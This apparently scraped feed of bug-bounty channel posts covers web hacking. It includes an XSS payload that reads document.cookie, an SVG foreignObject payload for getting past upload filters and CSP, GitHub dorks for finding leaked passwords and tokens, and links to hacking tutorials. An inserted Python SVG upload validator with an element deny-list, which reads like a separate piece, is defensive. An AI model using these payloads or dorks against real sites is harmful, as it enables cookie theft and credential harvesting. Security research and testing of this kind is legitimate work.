SQLi and XSS on the same program
Payload: <svg onload=prompt%26%230000000040document.cookie)>
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
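A server-side check for the SVG upload case described above, as an added example that is not part of the original post: it parses an uploaded file as XML and lists the reasons to reject it (`foreignObject` and other HTML-embedding elements, `on*` event handlers, non-allow-listed URLs). The function names, the deny-list and the URL allow-list are assumptions of this example, uploads are assumed to be UTF-8, and the sample inputs are constructed.

```python
import re
import xml.etree.ElementTree as ET

# Deny-list chosen for this example: elements that run script or embed HTML in an SVG.
FORBIDDEN_TAGS = {"script", "foreignobject", "iframe", "object", "embed", "body"}
URL_ATTRS = {"href", "src"}
SAFE_URL = re.compile(r"^(#|https?://|data:image/(png|jpeg|gif);)", re.I)

def local(name):
    """'{namespace}Tag' -> 'tag' (namespace dropped, lower-cased)."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data: bytes) -> list:
    """Return reasons to reject an uploaded SVG; an empty list means none found."""
    upper = data.upper()
    if b"<!DOCTYPE" in upper or b"<!ENTITY" in upper:
        return ["DTD or entity declaration"]  # refuse before parsing (entity expansion)
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if local(root.tag) != "svg":
        findings.append("root element is not <svg>")
    for el in root.iter():
        tag = local(el.tag)
        if tag in FORBIDDEN_TAGS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and not SAFE_URL.match(value.strip()):
                findings.append(f"unsafe URL in {name} on <{tag}>")
    return findings

# Constructed inputs: the file from the post above, and a harmless image.
POSTED_SVG = b"""<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><a href="#top"><circle r="4"/></a></svg>'

if __name__ == "__main__":
    for label, blob in (("posted", POSTED_SVG), ("clean", CLEAN_SVG)):
        print(label, svg_findings(blob) or "accepted")
```

A deny-list like this is a first filter only; serving user uploads from a separate origin or with `Content-Disposition: attachment` limits the impact of anything it misses.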
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
🔴 LIVE BUG BOUNTY: Advanced GitHub Recon | Secrets of Pro Bug Hunters
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
My teammate developed a Recon Engine with subdomain find, port scan, parameter find, technology detect, information disclosure, git dorking, CVE search and many more features. You guys should check out this Recon Engine. If you know of anything valid and interesting that is missing from the Recon Engine, you can suggest it to us by sending a link. DM us.
https://freelancermijan.github.io/reconengine/
Forwarded from Offensive Security
#Exclusive 🔥
HTB Academy – Bug Bounty Hunter Job Rule Path 2024.11
🔗 Download
Info : https://academy.hackthebox.com/path/preview/bug-bounty-hunter
@offensivesecurity
🔖 Here’s a list of 10 Github dorks to find secret and access tokens
"https://target.com" send_keys
"https://target.com" password
"https://target.com" api_key
"https://target.com" apikey
"https://target.com" jira_password
"https://target.com" root_password
"https://target.com" access_token
"https://target.com" config
"https://target.com" client_secret
"https://target.com" user auth
How to Find and Exploit Misconfigured phpMyAdmin | Bug Bounty POC
https://youtu.be/XtIMOsE0554?si=Hq708taLUcVb8nXB
"Ready to take your bug bounty skills to the next level? In this video, I’ll show you how to find and exploit misconfigured phpMyAdmin setups in web applications. 🚀